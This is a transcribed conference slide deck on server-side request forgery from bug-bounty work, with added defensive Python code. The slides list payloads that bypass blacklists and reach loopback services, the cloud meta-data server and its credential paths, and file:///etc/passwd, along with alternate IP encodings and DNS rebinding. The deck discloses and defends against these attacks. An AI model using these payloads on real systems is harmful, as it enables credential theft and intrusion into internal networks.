Server-side browsing considered harmful
Nicolas Grégoire, Agarri (offensive security), 06/19/2015

  1. Server-side browsing considered harmful
     Nicolas Grégoire, Agarri (offensive security)

  2. Agenda: Context, Vectors, Targets, Blacklists, Bugs, Toolbox

  3. Context

  4. Methodology
     - Identify server-side browsing
       - Ideally with responses echoed back
     - Identify protections (mostly blacklists)
       - Then bypass them
     - Try to maximize impact during exploitation
       - Prefer RCE or Cloud pwnage to a port scan
       - Aka "creatively express my laziness"

  5. Scope
     - Covers only a few bug bounty programs
       - Facebook, Yahoo, CoinBase, PayPal, ...
     - Criteria
       - Interesting targets
       - Good security team
       - Fast reaction
       - Nice payouts

  6. Vectors

  7. Vectors
     - Resources for developers
       - API explorer (Adobe Omniture - @riyazwalikar)
       - Debug of IPN aka Webhooks (payment world)
     - Third-party data sources
       - Upload from URL (Dropbox, FastMail, …)
       - Import of RSS feeds (YQL, Yandex, …)
     - Third-party authentication
       - OAuth, SAML, … (used everywhere)

  8. Vectors
     - Core features of the target application
       - Google Translate can work from a URL
       - Prezi "Export to portable format"
     - Mixed-content proxies
       - Hopscotch (FastMail), Camo (GitHub)
       - And also "imageproxy", "pilbox", ...
     - Hosted code
       - Parse will execute your own JS code (YQL too!)

  9. Targets

  10. URL handlers
      - file:// is an easy win
        - May be reached via an HTTP redirect
        - Java trick: file:///proc/self/cwd/../config/ (relative to the process's working directory, no need to know the install path)
      - Exotic handlers
        - gopher://, dict://, php://, jar://, tftp://, …
        - Look at the "SSRF Bible" if interested

  11. URL handlers
      - http:// and https:// are always available
        - Let's focus on these ones!
      - Lots of possible targets
        - HTTP and HTTPS applications
        - Services that tolerate HTTP-shaped input, like Redis (it ignores lines it does not understand and executes the ones it does)
        - Fingerprintable services
          - SMTP, SSH, ...

  12. Destinations
      - Main goals
        - Loopback
        - "Multicast" (strictly the link-local meta-data address, see slide 16)
      - Secondary goals
        - Internal network aka LAN
        - Public IP space

  13. Loopback
      - Often hosts sensitive services
        - IP-based ACL bypassed by design
      - Monitoring
        - Custom: Yahoo "ymon"
        - Open source: Consul, Monit, ...
      - Data repositories
        - Solr, Redis, memcached, ...

  14. Loopback
      - Depending on the architecture
        - Loopback may not be the backend
        - But an outbound proxy
        - Shared? With whom? In scope?
        - CoinBase & Proximo

  15. The loopback idiosyncrasy
      - Symptoms
        - Scanning using different features
        - Getting different results
      - Probable causes
        - Partial proxying (YQL)
        - Specialized backends

  16. Multicast
      - Strictly speaking a link-local address (169.254.0.0/16), not multicast, but the label stuck
      - Works for every EC2 or OpenStack VM
        - Meta-data server at http://169.254.169.254/
      - Interesting targets
        - Always present
          - /latest/meta-data/{hostname,public-ipv4,...}
        - User data (startup script for auto-scaling)
          - /latest/user-data
        - Temporary AWS credentials
          - /latest/meta-data/iam/security-credentials/
      - Caveat (added after the fact): since 2019 AWS IMDSv2 only answers requests carrying a session token obtained with a PUT, so a GET-only SSRF cannot read it; IMDSv1 keeps answering unless the instance is configured to require v2

  17. Internal network
      - Most of the time, there's a LAN
        - Except for some Cloud-only setups
      - With non-hardened services
        - Monitoring, stats, ...
        - Databases, keystores, ...
      - But you need the addressing plan
        - Btw, are you sure 10/8 is in scope?

  18. Public IP space
      - Sometimes...
        - Public ACL != internal ACL
        - Private services on public IP
      - Not so uncommon...
        - noc.parse.com => 54.85.239.3
        - Hosting a Go debugger

  19. Blacklists

  20. Blacklists
      - Only a few destinations to forbid
        - So implementing blacklists is easy
        - Or not?
      - Let's focus on
        - http://169.254.169.254/
        - http://127.0.0.1/

  21. Blacklists – DNS
      - http://metadata.nicob.net/
        - Simple static A record (pointing at 169.254.169.254)
      - http://169.254.169.254.xip.io/
        - Free wildcard DNS service (xip.io has since shut down; nip.io and sslip.io offer the same thing)
      - http://1ynrnhl.xip.io/
        - Encoded as base36(int('254.169.254.169')), i.e. the four octets reversed and read as one 32-bit integer
      - http://www.owasp.org.1ynrnhl.xip.io/
        - If both whitelists and blacklists are used

  22. Blacklists – HTTP redirects
      - Redirect to the meta-data server
        - HTTP 302 to http://169.254.169.254/
      - Static way
        - http://nicob.net/redir6a
      - Dynamic way
        - http://nicob.net/redir-http-169.254.169.254:80-

  23. Blacklists – HTTP redirects
      - Redirects work IRL
        - Yahoo and Stripe were affected
      - There's more than 302
        - Like 307 for POST to POST (303 turns the request into a GET; 307 and 308 keep the method and body)
      - Test with a (multi-step) loop
        - May produce some distinctive errors
      - Point to a redirect URL via the UI/API
        - Then make dynamic changes on your side

  24. Blacklists – Alternate IP encoding
      - Most common representation
        - Dotted decimal
        - 127.0.0.1, 169.254.169.254, ...
      - But most HTTP clients accept more
        - Browser, proxy, library, …
        - http://www.pc-help.org/obscure.htm

  25. Blacklists – Alternate IP encoding (every URL below is 169.254.169.254)
      http://425.510.425.510/              Dotted decimal with overflow
      http://2852039166/                   Dotless decimal
      http://7147006462/                   Dotless decimal with overflow
      http://0xA9.0xFE.0xA9.0xFE/          Dotted hexadecimal
      http://0xA9FEA9FE/                   Dotless hexadecimal
      http://0x41414141A9FEA9FE/           Dotless hexadecimal with overflow
      http://0251.0376.0251.0376/          Dotted octal
      http://0251.00376.000251.0000376/    Dotted octal with padding
      - The overflow forms are client-dependent: glibc inet_aton() and WHATWG-conformant browsers reject a part above 255, other parsers silently keep the low bits

  26. Blacklists – Alternate IP encoding
      - And you can mix them
        - http://425.254.0xa9.0376/
        - Decimal (w/ and w/o overflow) + hex + octal
      - Or convert only parts of the address
        - http://0251.0xfe.43518/
        - Octal + hex + 2-byte wide dotless decimal (43518 = 169 * 256 + 254)

  27. Blacklists – IPv6
      - http://[::169.254.169.254]/
        - IPv4-compatible address (deprecated form, still parsed by most stacks)
      - http://[::ffff:169.254.169.254]/
        - IPv4-mapped address

  28. Blacklists – loopback only
      - http://127.127.127.127/
        - Yes, it's a /8
      - http://0.0.0.0/
        - Works surprisingly often...
      - http://[::1]/ and http://[::]/
        - Moar IPv6
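The encodings of slides 21 and 24 to 28, run through an added Python example that is not part of the deck: a parser that accepts the same notations a tolerant HTTP client does and maps each one to the address that is really contacted, next to the kind of string blacklist these slides bypass. The parsing rules are an assumption modelled on BSD inet_aton() plus the overflow tolerance the slides describe, and FORBIDDEN is a suggested deny list, not the author's.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Number formats accepted by liberal IPv4 parsers: 0x.. hex, leading-0 octal
# (any amount of zero padding), otherwise decimal.
_PART = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.I)


def _part_value(part):
    if part.lower().startswith("0x"):
        return int(part, 16)
    if len(part) > 1 and part.startswith("0"):
        return int(part, 8)
    return int(part, 10)


def liberal_ipv4(host):
    """Parse an IPv4 literal the way a tolerant client does (assumption:
    inet_aton rules plus overflow tolerance):
      * 1 to 4 dot-separated parts, each hex, octal or decimal;
      * with 4 parts every part is one byte, excess bits are dropped
        (425 -> 169, 510 -> 254);
      * with fewer parts the last one fills the remaining bytes
        (a.b.c: c is 16 bits; a alone: 32 bits), excess bits dropped again.
    Returns an IPv4Address, or None when `host` is not an IPv4 literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(_PART.match(p) for p in parts):
        return None
    values = [_part_value(p) for p in parts]
    tail_bits = 8 * (5 - len(values))            # bits covered by the last part
    ip = 0
    for v in values[:-1]:
        ip = (ip << 8) | (v & 0xFF)
    ip = (ip << tail_bits) | (values[-1] & ((1 << tail_bits) - 1))
    return ipaddress.IPv4Address(ip & 0xFFFFFFFF)


def canonical_ip(host):
    """Map any literal (IPv4 in any notation, IPv6, IPv4-in-IPv6) to the
    address that will actually be contacted; None for a DNS name.
    Raises ValueError on a malformed IPv6 literal."""
    if ":" in host:                               # IPv6 literal, brackets already stripped
        v6 = ipaddress.IPv6Address(host)
        if v6.ipv4_mapped:                        # ::ffff:a.b.c.d
            return v6.ipv4_mapped
        if 1 < int(v6) < (1 << 32):               # ::a.b.c.d, the deprecated IPv4-compatible form
            return ipaddress.IPv4Address(int(v6))
        return v6
    return liberal_ipv4(host)


def destination(url):
    """Canonical address (as a string) a client would contact for `url`,
    or None when the host is a DNS name that still has to be resolved."""
    host = urlsplit(url).hostname
    if not host:
        return None
    ip = canonical_ip(host)
    return None if ip is None else str(ip)


# Suggested deny list: loopback, link-local (169.254.169.254), RFC 1918,
# "this network", and their IPv6 counterparts.
FORBIDDEN = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128",
    "fe80::/10", "fc00::/7",
)]

# The kind of check the slides bypass: exact string comparison.
NAIVE_BLACKLIST = {"127.0.0.1", "169.254.169.254"}


def naive_blocked(url):
    return (urlsplit(url).hostname or "") in NAIVE_BLACKLIST


def classify(url):
    """'blocked' / 'allowed' for IP literals; 'needs-dns' for a hostname,
    whose *resolved* address must be checked (and pinned, see slide 29)."""
    dest = destination(url)
    if dest is None:
        return "needs-dns" if urlsplit(url).hostname else "blocked"
    ip = ipaddress.ip_address(dest)
    return "blocked" if any(ip in net for net in FORBIDDEN) else "allowed"


if __name__ == "__main__":
    for u in ("http://425.510.425.510/", "http://0x41414141A9FEA9FE/",
              "http://[::ffff:169.254.169.254]/", "http://0251.0xfe.43518/"):
        print(u, destination(u), "naive:", naive_blocked(u), "canonical:", classify(u))
```

The point of the canonical form is that the deny list is compared against what the socket layer will connect to, not against the bytes the user typed; a hostname still comes back as "needs-dns" because no amount of string inspection tells you where it points.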

  29. Blacklists – DNS TOCTOU
      - Step 1
        - The backend server resolves the destination hostname
        - The backend server verifies the IP against a blacklist
        - The request is allowed to go to the outbound proxy
      - Step 2
        - The proxy resolves the destination hostname
        - The response now points to a private IP address
      - Toolbox
        - Dedicated sub-domain
        - Patched copy of DNSChef
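The redirect trick of slides 22 and 23 and the resolve-twice race of slide 29, as an added Python example that is not from the deck: a naive fetcher that checks the name once and then lets its HTTP client resolve again and follow redirects on its own, beside a hardened one that resolves each hop exactly once, checks the answer and connects to that checked address. DNS and HTTP are replaced by constructed in-memory stand-ins; the 93.184.216.34 address, the /ok path and the response bodies are invented for the example, and only the behaviour of http://nicob.net/redir6a (a 302 to the meta-data address) comes from the slides.

```python
import ipaddress
from urllib.parse import urljoin, urlsplit

REDIRECTS = (301, 302, 303, 307, 308)


class SsrfBlocked(Exception):
    pass


def forbidden_ip(ip_str):
    """Destinations a server-side fetcher must never contact: loopback,
    link-local (169.254.169.254), RFC 1918, unspecified (0.0.0.0 / ::), ..."""
    ip = ipaddress.ip_address(ip_str)
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)


def naive_fetch(url, resolve, request, max_hops=5):
    """Vulnerable pattern: the name is resolved and checked once, then the
    URL goes to an HTTP client that resolves it again and follows redirects."""
    parts = urlsplit(url)
    if forbidden_ip(resolve(parts.hostname)):          # the only check ever made
        raise SsrfBlocked("refused %s" % parts.hostname)
    for _ in range(max_hops):                           # what the client does on its own
        parts = urlsplit(url)
        status, headers, body = request(resolve(parts.hostname), parts.hostname, parts.path or "/")
        if status in REDIRECTS and "Location" in headers:
            url = urljoin(url, headers["Location"])     # followed unchecked
            continue
        return status, body
    raise SsrfBlocked("too many redirects")


def safe_fetch(url, resolve, request, max_hops=5):
    """Hardened: each hop is resolved exactly once, the answer is checked,
    and the connection goes to that checked IP (the name only travels in the
    Host header), so neither a redirect nor a changed DNS answer can reach a
    forbidden address."""
    for _ in range(max_hops):
        parts = urlsplit(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            raise SsrfBlocked("unsupported URL %r" % url)
        ip = resolve(parts.hostname)
        if forbidden_ip(ip):
            raise SsrfBlocked("%s resolves to %s" % (parts.hostname, ip))
        status, headers, body = request(ip, parts.hostname, parts.path or "/")
        if status in REDIRECTS and "Location" in headers:
            url = urljoin(url, headers["Location"])     # re-checked on the next turn
            continue
        return status, body
    raise SsrfBlocked("too many redirects")


# --- constructed, in-memory stand-ins for DNS and HTTP (no network) ---------
PUBLIC = "93.184.216.34"                                # assumed public address of nicob.net
FAKE_DNS = {"nicob.net": PUBLIC}
FAKE_WEB = {                                            # (ip, path) -> (status, headers, body)
    (PUBLIC, "/ok"): (200, {}, b"public page"),
    (PUBLIC, "/redir6a"): (302, {"Location": "http://169.254.169.254/latest/meta-data/"}, b""),
    ("169.254.169.254", "/latest/meta-data/"): (200, {}, b"ami-id\nhostname\niam/\n"),
    ("127.0.0.1", "/ok"): (200, {}, b"internal service"),
}


def fake_resolve(name):
    """Static DNS; IP literals resolve to themselves."""
    return FAKE_DNS.get(name, name)


def fake_request(ip, host, path):
    """Connect to `ip`, send `Host: host`, fetch `path`."""
    return FAKE_WEB[(ip, path)]


class RebindingResolver:
    """DNS TOCTOU: a public answer for the first lookup and loopback for
    every later one, which is what a patched DNSChef is used for."""
    def __init__(self):
        self.calls = 0

    def __call__(self, name):
        self.calls += 1
        return PUBLIC if self.calls == 1 else "127.0.0.1"


if __name__ == "__main__":
    for fetch in (naive_fetch, safe_fetch):
        for url in ("http://nicob.net/ok", "http://nicob.net/redir6a"):
            try:
                print(fetch.__name__, url, fetch(url, RebindingResolver(), fake_request))
            except SsrfBlocked as e:
                print(fetch.__name__, url, "blocked:", e)
```

In a real client, pinning means opening the socket to `ip` while sending `Host: name` and, for https, verifying the certificate (and SNI) against `name`; a plain `requests.get(url)` resolves again and follows redirects by itself, which is exactly what naive_fetch models.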

  30. Bugs

  31. (no text on this slide)

  32. Unused feature – Stripe
      - https://checkout.stripe.com/v3/checkout/desktop.js
      - Containing a (never called) Ajax function
        - Taking only one parameter named "image_url"

          $.ajax({
            url: "https://checkout-api.stripe.com/color",
            data: { image_url: uri },
            type: "GET",
            dataType: "json"
          })

  33. Unused feature – Stripe
      - Client-side blacklist
        - Not a security measure
        - Includes 127.0.0.0/24
      - Server-side blacklist
        - Loopback, internal, multicast, ...
        - But HTTP redirects are honored

  34. Unused feature – Stripe
      - Reward: $500

  35. (no text on this slide)

  36. Hidden vector – Prezi
      - Base64-encoded zipped XML document

  37. Hidden vector – Prezi
      - Easier to manage with a custom Burp extension

  38. Hidden vector – Prezi
      - Each embedded object is referred to by its URL

  39. Hidden vector – Prezi
      - Looking for some server-side processing
        - Feature "Export to PDF" => no
        - Feature "Export to ZIP" => yes
      - Exploits
        - file:///etc/passwd ($2k)
        - http://169.254.169.254/ ($2k)
        - http://0177.0.0.1/ (octal 0177 = 127; IPy bypass, $500)

  40. (no text on this slide)

  41. IPN – PayPal
      - IPN testing interface for developers
      - Existing blacklist
        - Bypassed with octal encoding
      - Exploit
        - https://012.0110.0150.0036/ (octal for 10.72.104.30)
        - IPN sent successfully to 10.72.104.30
      - Reward: $100

  42. (no text on this slide)

  43. IPN – John Doe I
      - Webhooks testing interface for developers
      - No restriction on the destination
      - Exploit
        - http://127.0.0.1:8500/v1/agent/self (Consul's HTTP API on its default port)
      - First fix bypassed
        - Using http://0.0.0.0:61315/
      - Reward: $750

  44. (no text on this slide)
